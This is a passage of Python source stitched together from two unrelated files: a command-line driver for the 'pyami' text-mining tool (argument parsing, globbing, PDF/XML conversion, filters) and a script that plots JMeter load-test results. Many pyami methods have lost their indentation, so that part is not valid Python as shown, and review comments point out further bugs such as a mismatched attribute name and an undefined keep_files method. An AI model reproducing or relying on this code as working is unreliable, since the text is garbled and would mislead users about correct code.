    FILTER = "filter"
    GLOB = "glob"
    KEEP = "keep"
    LOOKUP = "lookup"
    PRINT_SYMBOLS = "print_symbols"
    PROJ = "proj"
    RECURSE = "recurse"
    REGEX = "regex"
    SECT = "sect"
    SPLIT = "split"
    SYMBOLS = "symbols"
    TEST = "test"
    WIKIDATA_SPARQL = "wikidata_sparql"
    XPATH = "xpath"
    # apply methods 1:1 input-output
    PDF2TXT = "pdf2txt"
    TXT2SENT = "txt2sent"
    XML2TXT = "xml2txt"
    # combine methods n:1 input-output
    CONCAT_STR = "concat_str"
    # split methods 1:n input-output
    TXT2PARA = "txt2para"
    XML2SECT = "xml2sect"
    # symbols to update table
    NEW_SYMBOLS = ["proj"]
    LOGLEVEL = "loglevel"
    # shared module logger; level is adjusted by set_loglevel_from_args()
    logger = logging.getLogger("pyami")
    # class-level default; instances create their own SymbolIni in __init__
    symbol_ini = None
def __init__(self):
    """Set up flags, function tables and the symbol table for a run."""
    self.logger.debug(f"===============Examples=================")
    if self.logger.getEffectiveLevel() <= logging.DEBUG:
        # a stack trace helps trace who constructed the driver when debugging
        traceback.print_stack(file=sys.stdout)
    self.args = {}  # args captured in here as name/value without "-" or "--"
    self.apply = []
    self.combine = None
    self.config = None
    self.current_file = None
    self.fileset = None
    self.file_dict = {}  # possibly to be replaced by content_store.file_dict
    # self.content_store = ContentStore(self) # will expose content_store.file_dict
    self.func_dict = {}  # --apply keyword -> (callable, output extension)
    self.result = None
    self.set_flags()
    # NOTE(review): run_workflows later assigns self.wikipedia_lookup (different
    # name) — confirm which attribute is intended
    self.wikidata_lookup = None
    self.hit_counter = None  # Counter of dictionary hits, created in run_proj
    self.symbol_ini = SymbolIni(self)
    self.set_funcs()
    self.show_symbols = False
    self.ami_dictionary = None
    self.ami_logger = None  # rate-limited logger, created in read_file_content
    if self.show_symbols:
        pprint.pp(f"SYMBOLS\n {self.symbol_ini.symbols}")
def set_flags(self):
""" """
self.flag_dict = {}
self.flag_dict[self.APPLY] = None
self.flag_dict[self.CHECK_URLS] = None
self.flag_dict[self.COMBINE] = None
self.flag_dict[self.PRINT_SYMBOLS] = None
self.flag_dict[self.RECURSE] = True
def set_funcs(self):
    """Register the 1:1 'apply' transformations.

    Each entry maps an --apply keyword to a (callable, output-extension)
    tuple; the callable receives the file content (or file name, for PDFs)
    and the extension is applied by create_file_name().
    """
    # 1:1 methods
    self.func_dict[self.XML2TXT] = (XmlLib.remove_all_tags, ".xml.txt")
    self.func_dict[self.PDF2TXT] = (PdfReader.read_and_convert, ".pdf.txt")
    self.func_dict[self.TXT2SENT] = (TextUtil.split_into_sentences, ".sen.txt")
    # 1:n methods (split) are dispatched separately in split()
def create_arg_parser(self):
"""creates adds the arguments for pyami commandline"""
import argparse
parser = argparse.ArgumentParser(description='Search sections with dictionaries and patterns')
apply_choices = [self.PDF2TXT, self.TXT2SENT, self.XML2TXT]
self.logger.debug("ch", apply_choices)
parser.add_argument('--apply', nargs="+",
choices=['pdf2txt','txt2sent','xml2txt'],
help='list of sequential transformations (1:1 map) to apply to pipeline ({self.TXT2SENT} NYI)')
parser.add_argument('--assert', nargs="+",
help='assertions; failure gives error message (prototype)')
parser.add_argument('--delete', nargs="+",
help='delete globbed files. Argument/s <glob> are relative to `proj`')
parser.add_argument('--combine', nargs=1,
help='operation to combine files into final object (e.g. concat text or CSV file')
parser.add_argument('--config', '-c', nargs="*", default="PYAMI",
help='file (e.g. ~/pyami/config.ini) with list of config file(s) or config vars')
parser.add_argument('--debug', nargs="+",
help='debugging commands , symbols, numbers, (not formalised)')
parser.add_argument('--demo', nargs="*",
help='simple demos (NYI). empty gives list. May need downloading corpora')
parser.add_argument('--dict', '-d', nargs="+",
help='dictionaries to ami-search with, _help gives list')
parser.add_argument('--filter', nargs="+",
help='expr to filter with')
parser.add_argument('--glob', '-g', nargs="+",
help='glob files; python syntax (* and ** wildcards supported); '
'include alternatives in {...,...}. ')
# parser.add_argument('--help', '-h', nargs="?",
# help='output help; (NYI) an optional arg gives level')
parser.add_argument('--keep', nargs=1,
help='delete all except globbed files. Single argument <glob> is relative to `proj`')
parser.add_argument('--languages', nargs="+", default=["en"],
help='languages (NYI)')
parser.add_argument('--loglevel', '-l', default="info",
help='log level (NYI)')
parser.add_argument('--maxbars', nargs="?", type=int, default=25,
help='max bars on plot (NYI)')
parser.add_argument('--nosearch', action="store_true",
help='search (NYI)')
parser.add_argument('--outfile', type=str,
help='output file, normally 1. but (NYI) may track multiple input dirs (NYI)')
parser.add_argument('--patt', nargs="+",
help='patterns to search with (NYI); regex may need quoting')
parser.add_argument('--plot', action="store_false",
help='plot params (NYI)')
parser.add_argument('--proj', '-p', nargs="+",
help='projects to search; _help will give list')
parser.add_argument('--sect', '-s', nargs="+", # default=[AmiSection.INTRO, AmiSection.RESULTS],
help='sections to search; _help gives all(?)')
parser.add_argument('--split', nargs="+", choices=['txt2para','xml2sect'], # split fulltext.xml,
help='split fulltext.* into paras, sections')
parser.add_argument('--test', nargs="*",
choices=['file_lib', 'pdf_lib', 'text_lib'], # tests,
help='run tests for modules; no selection runs all')
return parser
def run_commands(self, arglist=None):
    """parses cmdline, runs cmds and outputs symbols

    :param arglist: raw commandline tokens (Default value = None; empty
        means argparse falls back to sys.argv)
    """
    self.logger.info(f"********** raw arglist {arglist}")
    self.parse_and_run_args(arglist)
    if self.flagged(self.PRINT_SYMBOLS):
        self.symbol_ini.print_symbols()

def parse_and_run_args(self, arglist):
    """runs cmds and makes substitutions (${...}) then runs workflow

    :param arglist: raw commandline tokens
    """
    if arglist is None:
        arglist = []
    parser = self.create_arg_parser()
    self.args = self.extract_parsed_arg_tuples(arglist, parser)
    self.logger.debug("ARGS: "+str(self.args))
    # second substitution pass: resolve symbols introduced by the first
    self.substitute_args()
    self.logger.debug("ARGS1: "+str(self.args))
    self.set_loglevel_from_args()
    self.run_workflows()
def substitute_args(self):
""" """
new_items = {}
self.logger.debug(f"SYMBOLS1 {self.symbol_ini.symbols}")
for item in self.args.items():
new_item = self.make_substitutions(item)
self.logger.debug(f"++++++++{item} ==> {new_item}")
new_items[new_item[0]] = new_item[1]
self.args = new_items
self.logger.info(f"******** substituted ARGS {self.args}")
def run_workflows(self):
    """Dispatch to the file workflow (--proj) or the module tests (--test)."""
    # file workflow
    # NOTE(review): __init__ initialises self.wikidata_lookup, but this and
    # apply_lookup use self.wikipedia_lookup — confirm which name is intended
    self.wikipedia_lookup = WikidataLookup()
    self.logger.warning(f"commandline args {self.args}")
    if self.PROJ in self.args:
        # a project run needs either sections or a glob to select files
        if self.SECT in self.args or self.GLOB in self.args:
            self.run_file_workflow()
    elif self.TEST in self.args:
        self.logger.warning(f"TEST in **args {self.args}")
        self.run_arg_tests()
def make_substitutions(self, item):
    """Resolve ${symbol} references inside one (key, value) arg pair.

    Handling by value type:
    * None and numeric/bool values pass through unchanged;
    * a 1-element list is unwrapped and substituted as a single value;
    * longer lists are substituted element-wise;
    * strings are substituted (unresolved ${...} is logged at debug level).
    Keys listed in NEW_SYMBOLS are also copied into the symbol table.

    :param item: (key, value) tuple from the parsed args
    :returns: (key, substituted_value) tuple
    """
    old_val = item[1]
    key = item[0]
    new_val = None
    if old_val is None:
        new_val = None
    elif isinstance(old_val, list) and len(old_val) == 1:  # single string in list
        # not sure of list, is often used when only one value
        val_item = old_val[0]
        new_val = self.symbol_ini.replace_symbols_in_arg(val_item)
    elif isinstance(old_val, list):
        new_list = []
        for val_item in old_val:
            self.logger.debug(f"OLD SYM {val_item}")
            new_v = self.symbol_ini.replace_symbols_in_arg(val_item)
            self.logger.debug(f"NEW SYM {new_v}")
            new_list.append(new_v)
        self.logger.debug(f"UPDATED LIST ITEMS: {new_list}")
        new_val = new_list
    elif isinstance(old_val, (int, bool, float, complex)):
        new_val = old_val
    elif isinstance(old_val, str):
        if "${" in old_val:
            self.logger.debug(f"Unresolved reference : {old_val}")
            new_val = self.symbol_ini.replace_symbols_in_arg(old_val)
        else:
            new_val = old_val
    else:
        self.logger.error(f"{old_val} unknown arg type {type(old_val)}")
        new_val = old_val
    # side effect: selected keys (e.g. proj) are published to the symbol table
    self.add_selected_keys_to_symbols_ini(key, new_val)
    return (key, new_val)
def get_symbol(self, symb):
"""gets symbol from pyami symbol table
"""
return self.symbol_ini.symbols.get(symb)
def extract_parsed_arg_tuples(self, arglist, parser):
"""
:param arglist:
:param parser:
"""
parsed_args = parser.parse_args() if not arglist else parser.parse_args(arglist)
self.logger.info(f"PARSED_ARGS {parsed_args}")
args = {}
arg_vars = vars(parsed_args)
new_items = {}
for item in arg_vars.items():
new_item = self.make_substitutions(item)
new_items[new_item[0]] = new_item[1]
return new_items
def add_selected_keys_to_symbols_ini(self, key, value):
"""
:param key:
:param value:
"""
if key in self.NEW_SYMBOLS:
self.symbol_ini.symbols[key] = value
def set_loglevel_from_args(self):
""" """
levels = {
"debug" : logging.DEBUG,
"info" : logging.INFO,
"warning": logging.WARNING,
"error": logging.ERROR,
}
if self.LOGLEVEL in self.args:
loglevel = self.args[self.LOGLEVEL]
self.logger.info(f"loglevel {loglevel}")
if loglevel is not None:
loglevel = str(loglevel)
if loglevel is not None and loglevel.lower() in levels:
level = levels[loglevel.lower()]
self.logger.setLevel(level)
def run_file_workflow(self):
    """Run the debug / proj / test steps selected by the parsed args.

    self.args contains every parser key (argparse guarantees this); a None
    value simply skips its step.
    """
    self.logger.debug(f"ARGS {self.args}")
    if not self.args:
        self.logger.error("no args given; try --proj or --test")
        return
    if self.args[self.DEBUG]:
        self.run_debug()
    if self.args[self.PROJ]:
        self.hit_counter = Counter()  # counts dictionary hits across files
        self.run_proj()
        self.logger.debug(f"hit counter: {self.hit_counter}")
    if self.args[self.TEST]:
        self.run_arg_tests()
    return

def run_debug(self):
    """Handle --debug subcommands; currently only 'symbols' is recognised."""
    for arg in self.args[self.DEBUG]:
        if arg == self.SYMBOLS:
            self.symbol_ini.print_symbols()
        else:
            self.logger.warning(f"unknown arg {arg} in debug: ")
def run_proj(self):
    """Run the project pipeline in fixed order:
    delete, keep, glob, split, apply, filter, combine, outfile, assert.
    """
    self.proj = self.args[self.PROJ]
    if self.args[self.DELETE]:
        self.delete_files()
    if self.args[self.KEEP]:  # NYI
        # NOTE(review): keep_files is not defined on this class — using --keep
        # would raise AttributeError
        self.keep_files()
    if self.args[self.GLOB]:
        self.glob_files()
    if self.args[self.SPLIT]:
        self.split(self.args.get(self.SPLIT))
    if self.args[self.APPLY]:
        self.apply_func(self.args.get(self.APPLY))
    if self.args[self.FILTER]:
        self.filter_file()
    if self.args[self.COMBINE]:
        self.combine_files_to_object()
    if self.args[self.OUTFILE]:
        self.write_output()
    if self.args[self.ASSERT]:
        self.run_assertions()

def run_arg_tests(self):
    """Run the module test suites selected by --test."""
    self.logger.warning(f"*****running tests : {self.args[self.TEST]}")
    _TESTS = ["file_lib", "pdf_lib", "text_lib"]
    if not self.args[self.TEST]:
        self.logger.warning(f"No tests given: choose some/all of {_TESTS}")
        return
    if "file_lib" in self.args[self.TEST]:
        import test_file
        self.logger.warning("run test_file")
        test_file.main()
    if "pdf_lib" in self.args[self.TEST]:
        import test_pdf
        self.logger.warning("run test_pdf")
        test_pdf.test_read_pdf()
    if "text_lib" in self.args[self.TEST]:
        # import test_text
        self.logger.warning("run test_text NYI")
        # test_text.main()
def delete_files(self):
if self.proj is None or self.proj == "":
self.ami_logger.error(f"delete requires --proj; ignored")
return
globs = self.args[self.DELETE]
for glob in globs:
self.delete_glob(glob)
def delete_glob(self, glob_exp):
    """Delete the files matching the proj-relative *glob_exp*.

    Safety: rejects expressions containing ".." or ending in "*" so a stray
    glob cannot wipe a whole tree. Directories are skipped (not yet
    supported).

    :param glob_exp: glob expression relative to self.proj
    """
    if ".." in glob_exp or glob_exp.endswith("*"):
        self.logger.error(f"glob {glob_exp} cannot contain .. or end in *")
        return
    full_glob = self.proj + "/" + glob_exp
    self.logger.warning(f"delete: {full_glob}")
    glob_recurse = True  # change this later
    globs = glob.glob(full_glob, recursive=glob_recurse)  # module-level `import glob`
    if globs is not None:
        files = {file: None for file in globs}
        self.logger.warning(f"deleting {len(files)} files ")
        for f in files:
            p = Path(f)
            if p.is_dir():
                self.logger.warning(f"Cannot yet delete directories {p}")
            else:
                p.unlink()
def glob_files(self):
import glob
glob_recurse = self.flagged(self.RECURSE)
glob_ = self.args[self.GLOB]
self.logger.info(f"glob: {glob_}")
files = {file: None for file in glob.glob(glob_, recursive=glob_recurse)}
self.file_dict = files
# self.content_store.create_file_dict(files)
self.logger.info(f"glob file count {len(self.file_dict)}")
def split(self, type):
    """split fulltext.* into paras, sections

    Dispatches per file on the suffix OR on the requested split *type*
    (xml2sect / txt2para).
    NOTE(review): parameter `type` shadows the builtin; renaming would be a
    visible interface change for keyword callers, so it is only noted here.
    """
    file_keys = self.file_dict.keys()
    for file in file_keys:
        suffix = FileLib.get_suffix(file)
        if ".xml" == suffix or type == self.XML2SECT:
            self.make_xml_sections(file)
        elif ".txt" == suffix or type == self.TXT2PARA:
            self.make_text_sections(file)
        else:
            self.logger.warning(f"no match for suffix: {suffix}")

def make_xml_sections(self, file):
    """Read *file* as XML and emit its sections via XmlLib."""
    xml_libx = XmlLib();
    xml_libx.logger.setLevel(logging.DEBUG)
    # NOTE(review): the return value is unused — presumably read() also stores
    # the parsed tree on xml_libx for make_sections(); confirm
    doc = xml_libx.read(file)
    xml_libx.make_sections("sections")

def make_text_sections(self, file):
    """Split a text file at empty lines and store the paragraph list."""
    sections = []
    with open(file, "r", encoding="utf-8") as f:
        text = f.read()
        sections = TextUtil.split_at_empty_newline(text)
        self.store_or_write_data(file, sections, )
def apply_func(self, apply_type):
    """Apply a registered 1:1 transformation to every globbed file.

    :param apply_type: key into func_dict (e.g. pdf2txt); file content is
        read first by read_file_content()
    """
    self.read_file_content()
    if apply_type:
        self.logger.info(f"apply {apply_type}")
        # an unknown key raises KeyError here, before the None check below
        func_tuple = self.func_dict[apply_type]
        if (func_tuple is None):
            self.logger.error(f"Cannot find func for {apply_type}")
        else:
            # apply data is stored in self.file_dict
            self.apply_to_file_content(func_tuple, apply_type)
    return
def normalize(self, unistr):
import unicodedata
self.logger.error("NYI")
unicodedata.normalize('NFKC', unistr)
pass
def filter_file(self):
    """Apply the --filter expression(s) to every globbed file and remove
    matching files from file_dict.
    """
    filter_expr = self.args[self.FILTER]
    self.logger.warning(f"filter: {filter_expr}")
    files = set()
    # record hits
    file_keys = self.file_dict.keys()
    for file in file_keys:
        filter_true = self.apply_filter(file, filter_expr)
        if filter_true:
            files.add(file)
    # delete hits from dict (separate pass: cannot mutate while iterating)
    for file in files:
        if file in self.file_dict:
            del self.file_dict[file]

def apply_filter(self, file, filter_expr):
    """Evaluate *filter_expr* (single expression, or AND-ed list) against
    the content of *file*.

    :returns: the accumulated hit list (truthy when the file matched);
        False when no expression was given
    """
    found = False
    if not filter_expr:
        self.logger.error(f"No filter expression")
        return found
    with open(file, "r", encoding="utf-8") as f:
        content = f.read()
    hits = []
    if isinstance(filter_expr, list):
        # and'ed at present
        for f_expr in filter_expr:
            hits = self.apply_filter_expr(content, file, f_expr, hits)
    else:
        hits = self.apply_filter_expr(content, file, filter_expr, hits)
    return hits
def apply_filter_expr(self, content, file, filter_expr, hit_list):
    """applies filters to hit list, usually AND

    *filter_expr* has the form "command(value)"; supported commands are
    contains / dictionary / lookup / regex / wikidata_sparql / xpath.
    Some commands only apply to certain suffixes (.txt / .xml).

    :param content: file content already read by apply_filter
    :param file: file path (used for suffix checks and xpath parsing)
    :param filter_expr: one command(value) expression
    :param hit_list: hits accumulated from previous expressions
    :returns: updated hit list (None when the filter value is unresolvable)
    """
    self.logger.debug(f"filter_expr {filter_expr}")
    filter_expr = filter_expr.strip()
    filter_value = self.extract_command_value(filter_expr)
    if filter_value is None:
        self.logger.error(f"bad filter_expr {filter_expr}")
        return hit_list
    filter = filter_value[0]
    value = filter_value[1]
    value = self.symbol_ini.replace_symbols_in_arg(value)
    if value is None:
        self.logger.warning(f"null value in filter {filter}")
        return None
    if False:  # placeholder keeping the elif chain uniform
        pass
    elif filter == self.CONTAINS and file.endswith(".txt"):
        # plain substring match
        if value in content:
            hit_list.append(value)
    elif filter == self.DICTIONARY and file.endswith(".xml"):
        # keep only hits present in the named ami-dictionary
        hits = self.apply_dictionary(hit_list, value)
        if len(hits) > 0:
            self.logger.debug(f"xpath {type(hits)} {hits}")
            hit_list.extend(hits)
    elif filter == self.LOOKUP:
        self.logger.debug(f"LOOKUP VALUE {value}")
        hits = self.apply_lookup(hit_list, value)
        if hits:
            hit_list = hits
    elif filter == self.REGEX:
        hits = self.apply_regex(hit_list, value)
        if hits:
            self.logger.debug(f"regex hits {hits}")
            hit_list = hits
    elif filter == self.WIKIDATA_SPARQL:
        hits = self.apply_wikidata_sparql(hit_list, value)
        if hits:
            self.ami_logger.warning(f"wikidata_sparql hits {hits}")
            hit_list = hits
    elif filter == self.XPATH and file.endswith(".xml"):
        # evaluate the xpath directly against the file (content is ignored)
        tree = etree.parse(file)
        hits = [h.strip() for h in tree.xpath(value)]
        if len(hits) > 0:
            self.ami_logger.warning(f"xpath {type(hits)} {hits}")
            hit_list.extend(hits)
    self.logger.debug(f"hit list {hit_list}")
    if hit_list:
        self.ami_logger.info(f"non-zero list {hit_list}")
    return hit_list
@classmethod
def extract_command_value(cls, command_expr):
"""split command(value) into tuple
value may have nested commands.
:returns: tuple of command, value
"""
if command_expr is None:
return None
bits = command_expr.split("(", 1)
cls.logger.debug(f"BITS {bits}")
return (bits[0], bits[1][:-1]) if len(bits) > 1 and bits[1].endswith(")") else None
def apply_dictionary(self, hits, name):
    """Keep only the hits whose lowercase form has an entry in the named
    ami-dictionary; counts each kept hit in self.hit_counter.

    :param hits: candidate hit strings
    :param name: dictionary symbol or file path
    :returns: filtered hit list
    """
    # the name may be a symbol pointing at a dictionary file, or a path itself
    dictionary_file = self.get_symbol(name)
    if dictionary_file is None:
        dictionary_file = name
    self.ami_dictionary = AmiDictionary.read_dictionary(file=dictionary_file)
    new_hits = []
    if self.ami_dictionary is not None:
        for hit in hits:
            entry = self.ami_dictionary.get_entry(hit.lower())
            if entry is not None:
                new_hits.append(hit)
                self.hit_counter[hit] += 1
    return new_hits
def apply_regex(self, hits, regex):
    """Keep only the hits whose start matches *regex* (re.match semantics)."""
    matcher = re.compile(regex)
    return [hit for hit in hits if matcher.match(hit)]
def read_file_content(self, to_str=True):
    """read file content as bytes into file_dict

    Dispatches per suffix: .xml/.txt are read as text, .png as bytes, and
    .pdf files only record their own name (converted lazily by the pdf2txt
    apply function).

    :param to_str: if true convert content to strings (Default value = True)
    """
    # rate-limited logger: first 10 files individually, then every 100th
    self.ami_logger = AmiLogger(self.logger, initial=10, routine = 100)
    for file in self.file_dict:
        self.ami_logger.info(f"reading {file}")
        if file.endswith(".xml"):
            self.read_string_content_to_dict(file, to_str)
        elif file.endswith(".pdf"):
            self.save_file_name_to_dict(file)
        elif file.endswith(".png"):
            self.read_binary_content_to_dict(file)
        elif file.endswith(".txt"):
            self.read_string_content_to_dict(file, to_str=False)
        else:
            self.logger.warning(f"cannot read file into string {file}")
def apply_lookup(self, hits, value):
    """Look each hit up in a dictionary or in Wikidata, per *value*.

    NOTE(review): results are only logged, never returned or accumulated —
    callers treating the (None) return as hits get nothing.
    """
    self.logger.debug(f"LOOKUP: {hits} {value}")
    for hit in hits:
        if False:  # placeholder keeping the elif chain uniform
            pass
        elif self.get_dictionary(value) is not None:
            dictionary = self.get_dictionary(value)
            # NOTE(review): broken %-style logging call — extra args with no
            # placeholders in the message
            self.logger.warning("USE DICTIONARY: NYI", value, dictionary)
        elif value == 'wikidata':
            qnumber = self.wikipedia_lookup.lookup_wikidata(hit)
            self.ami_logger.info(f"qnumber {qnumber}")
        else:
            self.logger.error(f"cannot parse lookup: {value}")

def apply_wikidata_sparql(self, hit_list, value):
    """Placeholder for SPARQL-based filtering; currently passes hits through."""
    if hit_list:
        self.ami_logger.warning(f"wikidata input {hit_list}")
    return hit_list
def get_dictionary(self, value):
dictionary = None
command_value = self.extract_command_value(value)
if command_value is not None and command_value[0] == "dictionary":
dictionary = command_value[1]
def read_string_content_to_dict(self, file, to_str):
    """reads file into string

    Can process bytes to string.
    :param file: path to read (text mode, utf-8)
    :param to_str: decode bytes content to utf-8 str
    :returns: file content, or None when decoding failed
    """
    data = None
    self.ami_logger.info(f"reading string content from {file}")
    with open(file, "r", encoding="utf-8") as f:
        try:
            data = f.read()
            # defensive: text mode already yields str, so this rarely fires
            if to_str and isinstance(data, bytes):
                data = data.decode("utf-8")
            self.store_or_write_data(file, data)
        except UnicodeDecodeError as ude:
            # best-effort: undecodable files are skipped, not fatal
            self.logger.error(f"skipped decoding error {ude}")
    return data

def save_file_name_to_dict(self, file):
    """Store the file NAME as its own content (PDFs are converted lazily)."""
    self.store_or_write_data(file, file)

def read_binary_content_to_dict(self, file):
    """Read the raw bytes of *file* into the content store."""
    with open(file, "rb", ) as f:
        try:
            data = f.read()
            self.store_or_write_data(file, data)
        except Exception as e:
            self.logger.error(f"skipped reading error {e}")
def apply_to_file_content(self, func_tuple, apply_type):
    """applies func to all string content in file_dict

    :param func_tuple: (callable, output extension) from func_dict
    :param apply_type: apply keyword; currently used for logging only
    """
    for file in self.file_dict.keys():
        data = self.file_dict.get(file)
        self.logger.debug(f"file: {file} => {func_tuple[0]}")
        new_file = self.create_file_name(file, func_tuple[1])
        try:
            new_data = func_tuple[0](data)
            self.store_or_write_data(file, new_data, new_file)
        except Exception as pdferr:
            # best-effort: a broken/non-PDF input is reported and skipped
            print(f"cannot read PDF {file} because {pdferr} (probably not a PDF), skipped")
    return
def create_file_name(self, file, extension):
    """Return *file* with its final suffix replaced by *extension*."""
    return str(Path(file).with_suffix(extension))
def store_or_write_data(self, file, data, new_file=None) -> None:
    """store or write data to disk

    Stores *data* under *file* in file_dict; when *new_file* is given the
    data is also written to disk.

    :param file: key in file_dict (the source file)
    :param data: content to store
    :param new_file: optional output path to write the data to
    """
    if file in self.file_dict:
        old_data = self.file_dict[file]
        if old_data is not None and old_data != data:
            # warn loudly when a later pipeline stage clobbers earlier content
            self.ami_logger.warning(f"===============================\n"
                                    f"=========OVERWRITING data for {file}\n"
                                    f"{self.file_dict[file]} \n========WITH======\n"
                                    f"{data}")
    if new_file is not None:
        self.ami_logger.warning(f"WROTE: {new_file}")
        with open(new_file, "w", encoding="utf-8") as f:
            f.write(data)
        self.file_dict[file] = new_file
    # save data old-style
    # NOTE(review): this immediately overwrites the new_file entry assigned
    # just above — looks unintended; confirm whether file_dict should hold
    # the data or the output path
    self.file_dict[file] = data
def combine_files_to_object(self):
    """Combine per-file results into a single object (concat_str only so far).

    The --combine value arrives from argparse as a 1-element list but
    make_substitutions unwraps singleton lists, so the plain string
    comparison below works after substitution.
    """
    methods = self.args.get(self.COMBINE)
    if methods and methods == self.CONCAT_STR:
        self.result = "\n".join(self.file_dict.values())
        self.ami_logger.warning(f"combine {self.result}")

def write_output(self):
    """Write the combined result and/or the per-file results to --outfile."""
    self.outfile = self.args[self.OUTFILE]
    if self.result:  # single output
        self.write_single_result()
    if self.file_dict:
        self.write_multiple_results()

def write_multiple_results(self):
    """Write each file's stored data to <its parent dir>/<outfile>."""
    for file in self.file_dict:
        data = self.file_dict[file]
        parent = FileLib.get_parent_dir(file)
        new_outfile = os.path.join(parent, self.outfile)
        with open(new_outfile, "w", encoding="utf-8") as f:
            self.ami_logger.warning(f"wrote results {new_outfile}")
            f.write(f"{str(data)}")

def write_single_result(self):
    """Write the combined result to --outfile, overwriting any existing file."""
    FileLib.force_write(self.outfile, self.result, overwrite=True)
    self.logger.warning(f"wrote results {self.outfile}")

def run_assertions(self):
    """Parse and run each --assert expression through the DSL parser."""
    assertions = self.args.get(self.ASSERT)
    if assertions is not None:
        self.parser = DSLParser()
        if isinstance(assertions, str):
            assertions = [assertions]
        for assertion in assertions:
            self.parser.parse_and_run(assertion)
def flagged(self, flag):
"""is flag set in flag_dict
if flag is in flag_dict and not falsy return true
:flag:
:param flag:
"""
return True if self.flag_dict.get(flag) else False
# def run_examples(self):
# # from examples import Examples
# examples = Examples()
#
# examples.example_pdf2txt()
# examples.example_split_pdf_txt_paras()
#
# examples.example_xml2sect()
# examples.example_split_oil26()
#
# examples.example_split_sentences()
# examples.example_xml2sect()
# examples.example_filter()
# examples.example_filter_species()
#
# pass
class ContentStore:
    """Caches content in memory or writes it to disk.

    Intended replacement for the earlier PyAMI.file_dict attribute.
    """

    def __init__(self, pyami):
        # owning PyAMI instance
        self.pyami = pyami
        # filename -> content (None before the file is read)
        self.file_dict = {}
def main():
    """ main entry point for cmdline

    With the hard-wired flags below (run_dsl and run_commands both False)
    control reaches the final else and runs the real commandline.
    """
    run_dsl = False
    examples = True  # NOTE(review): unused — the examples branch below is commented out
    run_commands = False
    PyAMI.logger.warning(f"\n============== running pyami main ===============\n{sys.argv[1:]}")
    pyami = PyAMI()
    # this needs commandline
    if run_commands:
        pyami.run_commands()
    if run_dsl:
        DSLParser.run_tests(sys.argv[1:])
    # if examples:
    #     pyami.run_examples()
    else:
        pyami.run_commands(sys.argv[1:])


if __name__ == "__main__":
    PyAMI.logger.warning(f"sys.argv: {sys.argv}")
    # NOTE(review): the original comment said "DONT rune main" but main() IS called
    main()
else:
    PyAMI.logger.debug(" NOT running search main anyway")
|
#!/usr/bin/env python
# copied from http://www.metaltoad.com/blog/plotting-your-load-test-jmeter
from pylab import *
import numpy as na
import matplotlib.font_manager
import csv
import sys
# Accumulators keyed on sample label, then on concurrent-thread count.
elapsed = {}     # response times (ms)
timestamps = {}  # request completion times (epoch ms)
starttimes = {}  # request start times (epoch ms)
errors = {}      # response times of failed requests

# Parse the CSV files; each filename encodes the thread count as "<n>-...".
for file in sys.argv[1:]:
    threads = int(file.split('-')[0])
    # NOTE(review): the file handle from open() is never closed
    for row in csv.DictReader(open(file)):
        if (not row['label'] in elapsed):
            # first sighting of this label: create its per-thread-count tables
            elapsed[row['label']] = {}
            timestamps[row['label']] = {}
            starttimes[row['label']] = {}
            errors[row['label']] = {}
        if (not threads in elapsed[row['label']]):
            elapsed[row['label']][threads] = []
            timestamps[row['label']][threads] = []
            starttimes[row['label']][threads] = []
            errors[row['label']][threads] = []
        elapsed[row['label']][threads].append(int(row['elapsed']))
        timestamps[row['label']][threads].append(int(row['timeStamp']))
        starttimes[row['label']][threads].append(int(row['timeStamp']) - int(row['elapsed']))
        if (row['success'] != 'true'):
            errors[row['label']][threads].append(int(row['elapsed']))
# Draw a separate figure for each label found in the results.
for label in elapsed:
    # Transform the lists for plotting
    plot_data = []
    throughput_data = [None]  # pad so throughput aligns with boxplot columns (x starts at 1)
    error_x = []
    error_y = []
    plot_labels = []
    column = 1
    # fixed: sorted() instead of pylab's sort() — np.sort cannot handle
    # dict_keys on Python 3
    for thread_count in sorted(elapsed[label].keys()):
        plot_data.append(elapsed[label][thread_count])
        plot_labels.append(thread_count)
        test_start = min(starttimes[label][thread_count])
        test_end = max(timestamps[label][thread_count])
        test_length = (test_end - test_start) / 1000  # ms -> s
        num_requests = len(timestamps[label][thread_count]) - len(errors[label][thread_count])
        if (test_length > 0):
            throughput_data.append(num_requests / float(test_length))
        else:
            throughput_data.append(0)
        for error in errors[label][thread_count]:
            error_x.append(column)
            error_y.append(error)
        column += 1
    # Start a new figure
    fig = figure(figsize=(9, 6))
    # Pick some colors
    palegreen = matplotlib.colors.colorConverter.to_rgb('#8CFF6F')
    paleblue = matplotlib.colors.colorConverter.to_rgb('#708DFF')
    # Plot response time on a log scale
    ax1 = fig.add_subplot(111)
    ax1.set_yscale('log')
    bp = boxplot(plot_data, notch=0, sym='+', vert=1, whis=1.5)
    # Tweak colors on the boxplot
    plt.setp(bp['boxes'], color='g')
    plt.setp(bp['whiskers'], color='g')
    plt.setp(bp['medians'], color='black')
    plt.setp(bp['fliers'], color=palegreen, marker='+')
    # Now fill the boxes with desired colors (removed unused `medians` list)
    numBoxes = len(plot_data)
    for i in range(numBoxes):
        box = bp['boxes'][i]
        boxX = []
        boxY = []
        for j in range(5):
            boxX.append(box.get_xdata()[j])
            boxY.append(box.get_ydata()[j])
        # fixed: materialize with list() — on Python 3 zip() is a lazy
        # iterator and Polygon needs a sequence of (x, y) pairs
        boxCoords = list(zip(boxX, boxY))
        boxPolygon = Polygon(boxCoords, facecolor=palegreen)
        ax1.add_patch(boxPolygon)
    # Plot the errors as red crosses on top of the boxes
    if (len(error_x) > 0):
        ax1.scatter(error_x, error_y, color='r', marker='x', zorder=3)
    # Plot throughput on a secondary y axis
    ax2 = ax1.twinx()
    ax2.plot(throughput_data, 'o-', color=paleblue, linewidth=2, markersize=8)
    # Label the axes
    ax1.set_title(label)
    ax1.set_xlabel('Number of concurrent requests')
    ax2.set_ylabel('Requests per second')
    ax1.set_ylabel('Milliseconds')
    ax1.set_xticks(range(1, len(plot_labels) + 1, 2))
    ax1.set_xticklabels(plot_labels[0::2])
    fig.subplots_adjust(top=0.9, bottom=0.15, right=0.85, left=0.15)
    # Turn off scientific notation for Y axis
    ax1.yaxis.set_major_formatter(ScalarFormatter(False))
    # Set the lower y limit to match the first column
    ax1.set_ylim(ymin=bp['boxes'][0].get_ydata()[0])
    # Draw some tick lines
    ax1.yaxis.grid(True, linestyle='-', which='major', color='grey')
    ax1.yaxis.grid(True, linestyle='-', which='minor', color='lightgrey')
    # Hide these grids behind plot objects
    ax1.set_axisbelow(True)
    # Add a legend
    line1 = Line2D([], [], marker='s', color=palegreen, markersize=10, linewidth=0)
    line2 = Line2D([], [], marker='o', color=paleblue, markersize=8, linewidth=2)
